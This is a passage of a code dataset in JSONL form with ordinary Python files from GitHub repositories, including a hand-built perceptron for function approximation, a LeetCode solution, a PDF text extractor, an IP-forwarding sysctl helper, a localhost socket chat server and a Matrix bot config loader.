time.sleep(0.1)","repo_name":"MaisarahPauzi/arduino_pyfirmata_projects","sub_path":"control computer system/button_shortcut.py","file_name":"button_shortcut.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14343470812","text":"\"\"\"\n\nDESCRIPTION:\n \n This project describe a simple implementation of Multilayer Perceptron (MLP) Neural Network\n \n through manual coding (without the use of TensorFlow). A special kind of neurons was used \n \n for layer 2 and 3 (binary neurons). The goal is to define and train an MLP dedicated to the\n \n approximation of a function F(x)\n \nDATASET \n\n The dataset was generated manually using Fourier Series Transformation\n \n y= F(x) = a0 + a1 cos(x) + b1 sin(x) + a2 cos(2x) + b2 sin(2x)\n \n After generating the input and output data, the function F(x) was assumed to be unknown\n \n \nSTEPS\n \n 1) Define the function F(x) and simulate input and output data\n \n 2) Simulate the training and test sets and assume the function F(x) to be unknown\n \n 3) Define precisely an MLP with 4 layers and 30 neurons\n \n L1 = input layer 1 neuron\n \n L2 = layer of size 18 = 2 groups of 9 neurons Z1 Z2 ...Z9 and U1 U2 ...U9\n \n L3 = layer of size 10 = 10 neurons S1...S10\n \n L4 = output layer of size 1 = 1 neuron denoted R\n \n 4) Implement a program to compute the states of L2 and the states of L3\n \n for any given input x\n \n 5) Apply the function G(x) versus x for x= 0, 0.01,0.02, ...0.99, 1\n \n 5) Construct the MLP to predict the results of the training and test sets and \n \n estimate the mean square error by comparing it to the true output.\n \n\n\"\"\"\n\n\n\n\"\"\" Import the libraries \"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nfrom statistics import mean\n\n\n\n\"\"\" Select Four (4) random numbers a0,a1,a2,b1,b2\"\"\"\n\nnp.random.seed(100)\na0= (np.random.uniform(low=-1, high=1, size=1)) \nnp.random.seed(67)\na1= (np.random.uniform(low=-1, high=1, size=1))\nnp.random.seed(706)\nb1= (np.random.uniform(low=-1, high=1, size=1))\nnp.random.seed(9)\na2= (np.random.uniform(low=-0.5, high=0.5, size=1))\nnp.random.seed(7)\nb2= (np.random.uniform(low=-0.5, high=0.5, size=1))\n\n\n\n\"\"\" Define the fourier function to generate the input and output dataset\"\"\"\n\ndef func1 (a):\n \n result_func = a0 + (a1 * np.cos((a))) + (b1 * np.sin((a))) + (a2*np.cos(2*(a)) + (b2 * np.sin(2*(a))))\n \n return result_func \n\n\n\"\"\"Generate random numbers as input to the function\"\"\" \n\nnp.random.seed(56877)\n\nxplot= np.sort(np.random.uniform(low=0, high=1, size=50))\n\n\n\"\"\"Get the output data\"\"\" \n\nyplot=func1(xplot)\n\n\n\"\"\"Plot the Function F(x)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(xplot, yplot, color='r', marker='o')\nplt.ylabel('F(x)')\nplt.xlabel('x')\nplt.title('Plot of F(x) vs x')\n\n\n\n\"\"\"Generate random numbers as input training set to the function\"\"\" \n\nnp.random.seed(80008)\ntrain_set= np.sort(np.random.uniform(low=0, high=1, size=1000))\nnp.around(train_set[:10],decimals=3)\n\n\n\"\"\"Get the output data for the training set\"\"\"\n\ntrain_outputs= func1(train_set)\nnp.around(train_outputs[:10],decimals=3)\n\n\n\"\"\"Generate random numbers as input for the test set to the function\"\"\" \n\nrandom.seed(600)\ntest_set= np.sort(np.random.uniform(low=0, high=1, size=500))\nnp.around(test_set[:10],decimals=3)\n\n\n\"\"\"Get the output data for the test set\"\"\"\n\ntest_outputs= func1(test_set)\nnp.around(test_outputs[:10],decimals=3)\n\nx = np.sort(train_set)\n\n\"\"\"\n Define the MLP Architecture with 4 layers\n\n\"\"\"\n\n\"\"\" Compute the binary states of layer2 and layer 3\"\"\"\n\n\ndef states(x):\n def g(v): #Binary activation function\n if v>0:\n return 1\n if v<=0:\n return 0\n\n #layer2 defined as l2() with input x\n def l2(x):\n z=list()\n u=list()\n \n for i in range(9): \n za= x - ((i+1)/10)\n zi = g(za)\n z.append(zi) \n for i in range(9):\n ua = -x + ((i+1)/10)\n ui = g(ua)\n u.append(ui) \n pl = (sum(z) + (9-sum (u)))/2 #define the position\n \n return z,u, pl\n \n z1,u1,pl=l2(x)\n \n def l3(x):\n z,u,pl = l2(x)\n J = []\n for i in range (10):\n if pl==i:\n a=1\n else:\n a=0\n J.append(a)\n return J, pl\n\n j1,pl=l3(x)\n \n return z1,u1,j1,pl\n\n\n\n\"\"\"\n Apply the program to the first 20 values x1 ... x20 in the training set and\n \n verify if the values taken by L2 and L3 correspond to the theoretically expected values\n\n\"\"\"\n\nb = []\nfor i in range(20): \n d=states(x[i])\n b.append(d) \nb = pd.DataFrame(b, columns=['z(L2)','u(L2)','L3','pl'])\na=pd.DataFrame(x[:20])\nc = pd.concat([b,a], axis=1)\nc.columns=['z(Layer 2)','u(Layer 2)','Layer 3','Location', 'input values of x']\nc\n\n\n\"\"\"\n\n Estimate the weights (Learning the weights) for the last layer\n \n\"\"\"\n\n\nx1= pd.DataFrame(train_set)\ny1= pd.DataFrame(train_outputs) \n\nd = pd.concat([x1,y1], axis=1)\nd.columns=['x','y']\n \n\"\"\"Learning of the weights for the last layer\"\"\"\n\nw1=mean(d[(d.x > 0) & (d.x < 0.1)].y)\nw2= mean(d[(d.x > 0.1) & (d.x < 0.2)].y)\nw3= mean(d[(d.x > 0.2) & (d.x < 0.3)].y)\nw4= mean(d[(d.x > 0.3) & (d.x < 0.4)].y)\nw5= mean(d[(d.x > 0.4) & (d.x < 0.5)].y)\nw6 = mean(d[(d.x > 0.5) & (d.x < 0.6)].y)\nw7 = mean(d[(d.x > 0.6) & (d.x < 0.7)].y)\nw8 = mean(d[(d.x > 0.7) & (d.x < 0.8)].y)\nw9 = mean(d[(d.x > 0.8) & (d.x < 0.9)].y)\nw10 = mean(d[(d.x > 0.9) & (d.x < 1.0)].y)\n\n\n\"\"\"Weights\"\"\"\n\nw1,w2,w3,w4,w5,w6,w7,w8,w9,w10\n\n\n\"\"\"Define the last layer architecture\"\"\"\n\ndef l4(x):\n p,b = l3(x) \n k = b/10\n k1 = (b+1)/10\n \n yv = w1*p[0] +w2*p[1] +w3*p[2] +w4*p[3] +w5*p[4] +w6*p[5] +w7*p[6] + w8*p[7] +w9*p[8] +w10*p[9] \n return yv\n\n\n\"\"\"\n Combine the layers to give a full description of the MLP Architecture\n \n\"\"\" \n\ndef y1(x):\n def g(v): #Binary activation function\n if v>0:\n return 1\n if v<=0:\n return 0\n\n #layer2 defined as l2() with input x\n def l2(x):\n z=list()\n u=list()\n \n for i in range(9): \n za= x - ((i+1)/10)\n zi = g(za)\n z.append(zi) \n for i in range(9):\n ua = -x + ((i+1)/10)\n ui = g(ua)\n u.append(ui) \n pl = (sum(z) + (9-sum (u)))/2\n \n return z,u, pl\n \n z1,u1,pl=l2(x)\n \n def l3(x):\n z,u,pl = l2(x)\n J = []\n for i in range (10):\n if pl==i:\n a=1\n else:\n a=0\n J.append(a)\n return J, pl\n\n j1,pl=l3(x) \n\n x1= pd.DataFrame(train_set)\n y1= pd.DataFrame(train_outputs) \n\n d = pd.concat([x1,y1], axis=1)\n d.columns=['x','y']\n \n w1=mean(d[(d.x > 0) & (d.x < 0.1)].y)\n w2= mean(d[(d.x > 0.1) & (d.x < 0.2)].y)\n w3= mean(d[(d.x > 0.2) & (d.x < 0.3)].y)\n w4= mean(d[(d.x > 0.3) & (d.x < 0.4)].y)\n w5= mean(d[(d.x > 0.4) & (d.x < 0.5)].y)\n w6 = mean(d[(d.x > 0.5) & (d.x < 0.6)].y)\n w7 = mean(d[(d.x > 0.6) & (d.x < 0.7)].y)\n w8 = mean(d[(d.x > 0.7) & (d.x < 0.8)].y)\n w9 = mean(d[(d.x > 0.8) & (d.x < 0.9)].y)\n w10 = mean(d[(d.x > 0.9) & (d.x < 1.0)].y)\n \n def l4(x):\n p,b = l3(x) \n k = b/10\n k1 = (b+1)/10\n \n yv = w1*p[0] +w2*p[1] +w3*p[2] +w4*p[3] +w5*p[4] +w6*p[5] +w7*p[6] + w8*p[7] +w9*p[8] +w10*p[9] \n return yv\n yv = l4(x)\n \n return yv\n \n\n\"\"\"\n Implement the program and compute G(x)\n\n\"\"\"\n\nbb= pd.DataFrame(np.arange(0.0, 1.0, 0.01).tolist()) #Define the input x\nbb2= np.arange(0.0, 1.0, 0.01).tolist()\nh1h=func1(bb) #Apply the MLP function to generate the output\ngg=[]\nfor i in range(100): \n bbmp= y1(bb2[i]) \n gg.append(bbmp) \n\n\n \n\"\"\"\n Plot the function G(x) versus x for x= 0, 0.01,0.02, ...0.99, 1\n \n On the same graph plot the (assumed unknown) function F(x)\n \n\"\"\"\n\nplt.figure(figsize=(9, 7))\nplt.plot(bb,gg,color='b', marker='o', label='G(x)')\nplt.plot(bb,h1h,color='r', marker='o', label='F(x)')\nplt.ylabel('G(x)/F(x)')\nplt.xlabel('x')\nplt.title('Plot of G(x)and F(x) vs x')\nplt.legend(bbox_to_anchor=(0.85, 0.98), loc='upper left', borderaxespad=0.)\n\n\n\"\"\"\n \n Compute the training set prediction\n \n Compute the test set prediction\n \n Compare the mean square error for both\n \n\"\"\"\n\n\n\n\n\"\"\" Training Set Prediction \"\"\"\n\n\npredtr=[]\nfor i in range(1000): \n pp= y1(x[i]) \n predtr.append(pp)\n \nprederr=abs(predtr-train_outputs)\n\n\n\n\"\"\" Mean Square Error for Training Set \"\"\"\n\nmsetr= (sum((prederr*prederr)))/1000 \n'{0:.6f}'.format(msetr)\n\n\n\n\n\"\"\"Plot of Predicted Result and True Output (Training Set)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(train_set,train_outputs,color='b', marker='o', label='True Output')\nplt.plot(train_set,predtr,color='r', marker='o', label='Predicted Output')\nplt.ylabel('Result (y)')\nplt.xlabel('Input value (x)')\nplt.title('Plot of Predicted Result and True Output (Training Set)')\nplt.legend(bbox_to_anchor=(0.6, 0.8), loc='upper left', borderaxespad=0.)\n\n\n\n\"\"\" Test Set Prediction \"\"\"\n\npredtest1=[]\nfor i in range(500): \n ppt= y1(test_set[i]) \n predtest1.append(ppt)\n\npredtest=abs(predtest1-test_outputs)\n\n\n\n\n\"\"\" Mean Square Error for Test Set \"\"\"\n\nmsetest= (sum((predtest*predtest)))/500\n\n'{0:.6f}'.format(msetest)\n\n\n\n\n\"\"\"Plot of Predicted Result and True Output (Test Set)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(test_set,test_outputs,color='b', marker='o', label='True Output')\nplt.plot(test_set,predtest1,color='r', marker='o', label='Predicted Output')\nplt.ylabel('Result (y)')\nplt.xlabel('Input value (x)')\nplt.title('Plot of Predicted Result and True Output (Test Set)')\nplt.legend(bbox_to_anchor=(0.6, 0.8), loc='upper left', borderaxespad=0.)\n\n\n\n\n\n\n\n\n","repo_name":"JamiuAdegbite/Binuyo","sub_path":"Approximation of a Function by MultiLayer Perceptron.py","file_name":"Approximation of a Function by MultiLayer Perceptron.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32324619615","text":"# 496. Next Greater Element I\n# The next greater element of some element x in an array is the first greater element \n# that is to the right of x in the same array.\n# You are given two distinct 0-indexed integer arrays nums1 and nums2, where nums1 is a subset of nums2.\n# For each 0 <= i < nums1.length, find the index j such that nums1[i] == nums2[j] \n# and determine the next greater element of nums2[j] in nums2. \n# If there is no next greater element, then the answer for this query is -1.\n# Return an array ans of length nums1.length such that ans[i] is the next greater element as described above.\n# Scott 2021/08/23\n\nfrom typing import List\n\nclass Solution:\n\n # Original Brute force\n # 28%\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n result = []\n for i in range(len(nums1)):\n a = nums1[i]\n if a in nums2:\n found = False\n index = nums2.index(a)\n for j in range(index + 1, len(nums2)):\n b = nums2[j]\n if b > a:\n found = True\n result.append(b)\n break\n if not found:\n result.append(-1)\n else:\n result.append(-1)\n return result\n ","repo_name":"ScottCTD/Programming-Practices","sub_path":"LeetCode/python/Q496.py","file_name":"Q496.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30815965396","text":"#cadastrar valores em uma lista\nvalores = list()\n#caso o número já exista, não adiciona\nwhile True:\n valor = (int(input(\"Digite um valor: \")))\n if valor in valores:\n print(f'Valor duplicado, não adicionado {valor}')\n else:\n valores.append(valor)\n print(f'Valor adicionado com sucesso: {valores}')\n continuar = str(input(\"Deseja continuar? [S/N] \")).upper().strip()[0]\n if continuar == 'N':\n break\nprint(\"-\"*30)\nprint(f'Você digitou os valores {sorted(valores)}')\nprint(\"-\"*30)\n","repo_name":"edgarssc/estudos_pf","sub_path":"Python/pythonexercicios/aula17_listas_desafio79.py","file_name":"aula17_listas_desafio79.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25409122058","text":"from ufwi_rpcd.common.transaction import Transaction\nfrom ufwi_rpcd.backend.logger import Logger\nfrom ufwi_ruleset.iptables.sysctl import sysctlGet, sysctlSet\n\nclass IPForward(Transaction, Logger):\n def __init__(self, enable, ipv6, logger):\n if ipv6:\n name = 'ipv6_forward'\n else:\n name = 'ipv4_forward'\n Logger.__init__(self, name, parent=logger)\n self.enable = enable\n if ipv6:\n self.sysctl_key = u'net.ipv6.conf.all.forwarding'\n else:\n self.sysctl_key = u'net.ipv4.ip_forward'\n\n def save(self):\n value = sysctlGet(self.sysctl_key)\n self.was_enabled = (value == '1')\n self.info(\"Get current state: %s\" % self.was_enabled)\n\n def setState(self, enabled):\n if enabled:\n self.warning(\"Enable forward\")\n value = u'1'\n else:\n self.warning(\"Disable forward\")\n value = u'0'\n sysctlSet(self, self.sysctl_key, value)\n\n def apply(self):\n self.setState(self.enable)\n\n def restore(self):\n self.setState(self.was_enabled)\n\n","repo_name":"maximerobin/Ufwi","sub_path":"etude_de_base/ufwi-administration-suite-ufwi-ruleset/ufwi_ruleset/iptables/ip_forward.py","file_name":"ip_forward.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"44013608510","text":"import fitz\nimport matplotlib.pyplot as plt\nfrom categorizers.body_text_block_categorizer import BodyTextBlockCategorizer\nfrom categorizers.fragmented_block_categorizer import FragmentedTextBlockCategorizer\nfrom itertools import islice\nfrom matplotlib.patches import Rectangle\nfrom pathlib import Path\nfrom termcolor import colored\nfrom utils.calculator import (\n flatten_len,\n kilo_count,\n rect_area,\n char_per_pixel,\n avg_line_width,\n)\n\nfrom utils.logger import logger, add_fillers, Runtimer\nfrom utils.tokenizer import (\n WordTokenizer,\n)\nfrom utils.text_processor import TextBlock\n\n\nclass PDFStreamExtractor:\n pdf_root = Path(__file__).parents[1] / \"pdfs\"\n image_root = pdf_root / \"images\"\n\n def __init__(self):\n pdf_filename = \"Exploring pathological signatures for predicting the recurrence of early-stage hepatocellular carcinoma based on deep learning.pdf\"\n self.pdf_filename = pdf_filename\n self.pdf_fullpath = self.pdf_root / self.pdf_filename\n self.pdf_doc = fitz.open(self.pdf_fullpath)\n\n def extract_all_texts(self):\n for idx, page in enumerate(self.pdf_doc):\n text = page.get_text(\"block\")\n logger.info(f\"Page {idx+1}:\")\n logger.debug(text)\n\n def calc_rect_center(self, rect, reverse_y=False):\n if reverse_y:\n x0, y0, x1, y1 = rect[0], -rect[1], rect[2], -rect[3]\n else:\n x0, y0, x1, y1 = rect\n\n x_center = (x0 + x1) / 2\n y_center = (y0 + y1) / 2\n return (x_center, y_center)\n\n def plot_text_block_rect(self, points, rects, categories, point_texts):\n fig, ax = plt.subplots()\n colors = [\"b\", \"r\", \"g\", \"c\", \"m\", \"y\", \"k\"]\n\n for i, rect_center in enumerate(points):\n category_idx = categories[i]\n color = colors[category_idx]\n x0, y0, x1, y1 = rects[i]\n rect = Rectangle((x0, -y0), x1 - x0, -y1 + y0, fill=False, edgecolor=color)\n ax.add_patch(rect)\n x, y = rect_center\n plt.scatter(x, y, color=color)\n plt.annotate(point_texts[i], rect_center)\n plt.show()\n\n def extract_all_text_blocks(self):\n # * https://pymupdf.readthedocs.io/en/latest/textpage.html#TextPage.extractBLOCKS\n\n rect_centers = []\n rects = []\n point_texts = []\n categorize_vectors = []\n doc_blocks = []\n tokenizer = WordTokenizer()\n doc_token_cnt = 0\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc)):\n page_blocks = page.get_text(\"blocks\")\n doc_blocks.append(page_blocks)\n page_cnt = page_idx + 1\n logger.info(\n colored(\n add_fillers(f\"Start [Page {page_cnt}] [{len(page_blocks)} blocks]\"),\n \"light_yellow\",\n )\n )\n block_cnt = 0\n page_token_cnt = 0\n for block in page_blocks:\n # Process block values\n block_rect = block[:4] # (x0,y0,x1,y1)\n block_text = block[4]\n block_num = block[5]\n block_cnt = block_num + 1\n # block_cnt += 1\n block_type = \"text\" if block[6] == 0 else \"image\"\n\n if block_type == \"text\":\n token_cnt = tokenizer.count_tokens(block_text.replace(\"\\n\", \" \"))\n page_token_cnt += token_cnt\n else:\n token_cnt = 0\n\n categorize_vectors.append((*block_rect, block_text))\n\n # Prepare for plot categorization of text blocks\n rects.append(block_rect)\n rect_center = self.calc_rect_center(block_rect, reverse_y=True)\n rect_centers.append(rect_center)\n point_text = f\"({page_cnt}.{block_cnt})\"\n point_texts.append(point_text)\n\n # Logging\n token_cnt_str = \"\"\n if block_type == \"text\":\n token_cnt_str = f\"| (tokens: {token_cnt})\"\n logger.info(\n f\"<{block_type}> Block: {page_cnt}.{block_cnt} {token_cnt_str}\"\n )\n\n logger.debug(f\"{rect_center} - {block_rect}\")\n logger.debug(block_text)\n\n doc_token_cnt += page_token_cnt\n\n logger.info(f\"{page_token_cnt} tokens in Page {page_cnt}.\")\n logger.info(\n colored(\n add_fillers(f\"End [Page {page_cnt}] [{len(page_blocks)} blocks]\"),\n \"light_magenta\",\n )\n )\n\n doc_token_cnt_kilo = kilo_count(doc_token_cnt)\n logger.info(\n colored(\n f\"{doc_token_cnt_kilo}k ({doc_token_cnt}) tokens in whole document.\\n\",\n \"light_green\",\n )\n )\n\n categorizer = BodyTextBlockCategorizer(categorize_vectors)\n categorizer.run()\n\n # self.plot_text_block_rect(\n # categories=categorizer.categories,\n # points=rect_centers,\n # rects=rects,\n # point_texts=point_texts,\n # )\n\n filtered_doc_blocks = self.remove_no_body_text_blocks(\n doc_blocks=doc_blocks, categories=categorizer.categories\n )\n\n def save_image(self, xref, basepath):\n ext_image = self.pdf_doc.extract_image(xref)\n ext = ext_image[\"ext\"]\n fullpath = basepath.with_suffix(f\".{ext}\")\n print(f\" > Saving image to: {fullpath}\")\n pix = fitz.Pixmap(self.pdf_doc, xref)\n pix.save(fullpath)\n\n def extract_images(self):\n img_idx = 0\n for page_idx, page in enumerate(self.pdf_doc):\n img_infos = page.get_images()\n print(f\"Page {page_idx}: {img_infos}\")\n for info in img_infos:\n xref = info[0]\n img_basepath = self.image_root / f\"img_{img_idx+1}\"\n self.save_image(xref, img_basepath)\n img_idx += 1\n\n def extract_all_text_block_dicts(self):\n \"\"\"\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#TextPage.extractDICT\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#structure-of-dictionary-outputs\n * https://pymupdf.readthedocs.io/en/latest/_images/img-textpage.png\n * https://pymupdf.readthedocs.io/en/latest/textpage.html#block-dictionaries\n\n Data Structure of a Text/Image Block Dict in Page Blocks:\n\n ```json\n {\n \"width\": ,\n \"height\": ,\n \"blocks\": [\n {\n \"type\": (0), // \"text\"\n \"bbox\": (4 floats),\n \"number\": (start from 0),\n \"lines\": [\n {\n \"bbox\": (4 floats),\n \"wmode\": (0),\n \"dir\": (2 floats),\n \"spans\": [\n {\n \"bbox\": (4 floats),\n \"origin\": (2 floats),\n \"flags\": ,\n \"size\": ,\n \"font\" ,\n \"color\": ,\n \"ascender\": ,\n \"descender\": ,\n \"text\": \n },\n ...\n ]\n },\n ...\n ]\n },\n {\n \"type\": (1), // \"image\"\n \"bbox\": (4 floats),\n \"number\": ,\n \"width\": ,\n \"height\": ,\n \"ext\": (\"jpeg\"),\n \"colorspace\": ,\n \"xres\": ,\n \"yres\": ,\n \"bpc\": ,\n \"transform\": (6 floats),\n \"size\": ,\n \"image\": \n },\n ...\n ]\n }\n ```\n \"\"\"\n doc_blocks = [\n page.get_text(\"dict\")[\"blocks\"]\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc))\n ]\n body_text_block_categorizer = BodyTextBlockCategorizer(doc_blocks)\n body_text_block_categorizer.run()\n self.filtered_doc_blocks = body_text_block_categorizer.filtered_doc_blocks\n\n filtered_doc_text_blocks = [\n [block for block in page_blocks if block[\"type\"] == 0]\n for page_blocks in self.filtered_doc_blocks\n ]\n logger.info(\n f\"{flatten_len(filtered_doc_text_blocks)} text blocks in {flatten_len(self.filtered_doc_blocks)} blocks.\"\n )\n\n fragmented_text_block_categorizer = FragmentedTextBlockCategorizer(\n filtered_doc_text_blocks\n )\n fragmented_text_block_categorizer.run()\n\n return\n\n for page_idx, page_blocks in enumerate(self.filtered_doc_blocks[:9]):\n doc_blocks.append(page_blocks)\n logger.info(\n colored(\n f\"{len(page_blocks)} blocks in Page {page_idx+1}\", \"light_magenta\"\n )\n )\n block_cnt = 0\n for block in page_blocks:\n block_type = \"text\" if block[\"type\"] == 0 else \"image\"\n block_num = block[\"number\"]\n block_cnt += 1\n block_bbox = block[\"bbox\"]\n block_area = rect_area(*block_bbox)\n\n logger.info(\n colored(\n f\"<{block_type}> Block {block_num}/{len(page_blocks)} \"\n f\"in Page {page_idx+1}/{len(self.filtered_doc_blocks)}\",\n \"light_yellow\",\n )\n )\n\n if block_type == \"text\":\n tblock = TextBlock(block)\n block_text = tblock.get_block_text()\n block_bbox = tblock.get_bbox()\n block_font, block_fontsize = tblock.get_block_main_font()\n block_tokens_num = tblock.get_block_tokens_num()\n block_density = char_per_pixel(len(block_text), block_area)\n logger.info(\n colored(\n f\"<{block_font}> <{block_fontsize}> \"\n f\"({len(block_text)}/{block_area}) ({block_density}) \"\n f\"({avg_line_width(block_text)})\",\n \"light_magenta\",\n )\n )\n logger.info(colored(f\"{block_tokens_num} tokens.\", \"light_green\"))\n logger.info(colored(f\"{block_text}\", \"light_cyan\"))\n\n elif block_type == \"image\":\n img_width = block[\"width\"]\n img_height = block[\"height\"]\n img_ext = block[\"ext\"]\n img_size = block[\"size\"]\n img_size_mb = round(img_size / (1024 * 1024), 1)\n img_bytes = block[\"image\"]\n logger.info(\n colored(\n f\"<{img_ext.upper()}> <{img_width}x{img_height}> ({img_size_mb} MB)\",\n \"light_magenta\",\n )\n )\n else:\n raise ValueError(f\"Unknown block type: {block_type}\")\n\n def extract_all_text_htmls(self):\n html_str = \"\"\n for page_idx, page in islice(enumerate(self.pdf_doc), len(self.pdf_doc)):\n html_str += page.get_text(\"html\")\n with open(\"output.html\", \"w\") as wf:\n wf.write(html_str)\n\n def replace_html_entities(self, text):\n symbols = {\n \" \": \" \",\n \"&\": \"&\",\n }\n for k, v in symbols.items():\n text = text.replace(k, v)\n return text\n\n def format_toc(self):\n levels = [0] * 10\n lines = []\n for level, title, page, dest in self.pdf_toc:\n levels[level - 1] += 1\n for i in range(level, len(levels)):\n levels[i] = 0\n\n level_str = \".\".join(map(str, levels[1:level]))\n trailing_level_str = \" \" if level > 1 else \"\"\n leading_level_str = \" \" * 2 * max(level - 2, 0)\n\n title_str = self.replace_html_entities(title)\n\n lines.append(\n f\"{leading_level_str}{level_str}{trailing_level_str}{title_str}\"\n )\n\n for line in lines:\n print(line)\n\n def extract_toc(self):\n self.pdf_toc = self.pdf_doc.get_toc(simple=False)\n self.format_toc()\n\n def extract_tables(self):\n table_parser = PDFTableExtractor(self.pdf_fullpath)\n table_parser.run()\n\n def run(self):\n # self.extract_all_texts()\n # self.extract_all_text_blocks()\n # self.extract_toc()\n # self.extract_images()\n # self.extract_all_text_htmls()\n # self.extract_all_text_block_dicts()\n # self.extract_tables()\n pass\n","repo_name":"Hansimov/GPT-Paper","sub_path":"documents/pdf_stream_extractor.py","file_name":"pdf_stream_extractor.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"13616282939","text":"class Student:\n class_ = \"student\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def score_calculator(self, score1, score2, score3):\n total = score1 + score2 + score3\n avg_test_score = total/3\n return avg_test_score\n\nJohn = Student(\"John\", \"21\")\nJane = Student(\"Jane\", \"22\")\n\nprint(John.class_)\nprint(Jane.score_calculator(6, 10, 20))","repo_name":"kirankalsi/python-exercises","sub_path":"programs/classes_attributes_ex.py","file_name":"classes_attributes_ex.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12986925241","text":"import sys, time, socket, threading \n\nclass bcolors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[96m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nbanner = \"\"\" \n _____ _____ _____ _____ \n | | | | _ |_ _| \n | --| | | | | \n |_____|__|__|__|__| |_| \n _____ _____ _____ _____ _____ _____ \n| __| __| __ | | | __| __ |\n|__ | __| -| | | __| -|\n|_____|_____|__|__|\\___/|_____|__|__|\n\n[+] Welcome to our simple chatroom [+]\n\"\"\"\nhost = '127.0.0.1' \nport = 12345 \n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver.bind((host, port)) \nserver.listen()\n\nclients = []\nnicknames = []\n\ndef banner_slowprint(s):\n\tfor c in s + '\\n':\n\t\tsys.stdout.write(c)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(.01/10)\n\t\t\ndef slowprint(s):\n\tfor c in s + '\\n':\n\t\tsys.stdout.write(c)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(1/10)\n\t\t\ndef broadcast(message): \n for client in clients:\n client.send(message)\n\ndef handle(client): \n while True:\n try: \n message = client.recv(1024)\n broadcast(message)\n except: \n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n broadcast('{} left in the chatroom!\\n'.format(nickname).encode('ascii'))\n nicknames.remove(nickname)\n break\n\ndef receive(): \n while True:\n client, address = server.accept()\n slowprint(bcolors.GREEN+\"[CONNECTED] Connected with {}\".format(str(address))) \n client.send('NICKNAME'.encode('ascii'))\n nickname = client.recv(1024).decode('ascii')\n nicknames.append(nickname)\n clients.append(client)\n slowprint(\"[CLIENT] {}\".format(nickname))\n broadcast(\"[CLIENT] {} joined in the chatroom!\".format(nickname).encode('ascii'))\n #client.send('[!] Connected to the server...\\n'.encode('ascii'))\n #client.send('\\n[+] You can now start chatting...'.encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\nbanner_slowprint(bcolors.HEADER+banner+bcolors.ENDC)\nslowprint(bcolors.WARNING+\"[STARTING] Server is starting...\"+bcolors.ENDC)\nslowprint(bcolors.GREEN+\"[STARTED] Server is up and running...\"+bcolors.ENDC)\nslowprint(bcolors.BLUE+\"[WAITING] Waiting for clients to connect...\"+bcolors.ENDC)\nreceive()\n","repo_name":"mkdirlove/CHAT-APP","sub_path":"v2/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"18264097220","text":"from simplematrixbotlib import Config\nfrom os import environ\n\n\nclass FileConfig(Config):\n keys = [\"HOMESERVER\", \"USERNAME\", \"PASSWORD\", \"LOGIN_TOKEN\",\n \"ACCESS_TOKEN\", \"OPEN_AI_KEY\", \"REPLICATE_API_TOKEN\", \"ENABLE_ENCRYPTION\"]\n\n def __init__(self, config_path):\n super().__init__()\n if \"CONFIG_PATH\" in environ.keys():\n config_path = environ[\"CONFIG_PATH\"]\n if config_path is None:\n config_path = \"config/config.yml\"\n self._load_env_dict()\n self.load_toml(config_path)\n if hasattr(self, \"ENABLE_ENCRYPTION\") and self.ENABLE_ENCRYPTION:\n self._enable_encryption()\n\n def _set_attr(self, key, value):\n print(f\"Setting {key} to {value}\")\n setattr(self, key, value)\n\n def _enable_encryption(self):\n self.encryption_enabled = True\n self.emoji_verify = True\n self.ignore_unverified_devices = True\n self.store_path = './crypto_store/'\n\n def _load_env_dict(self):\n for key in self.keys:\n if key.upper() in environ.keys():\n self._set_attr(key.upper(), environ[key.upper()])\n if key.lower() in environ.keys():\n self._set_attr(key.upper(), environ[key.lower()])\n\n def _load_config_dict(self, config_dict: dict) -> None:\n for key, value in config_dict.items():\n key = key.upper()\n if hasattr(self, key) and getattr(self, key) is not None:\n continue\n if value == 'True' or value == 'true':\n value = True\n elif value == 'False' or value == 'false':\n value = False\n\n self._set_attr(key, value)\n","repo_name":"ly1998117/MatrixChatGPTVoiceBot","sub_path":"matrix_chatgpt_voice_bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"11932918687","text":"'''\r\nCreated on 11 jun 2022\r\n\r\n@author: txema\r\n'''\r\nfrom functools import reduce\r\n\r\ndef pares(lista): \r\n 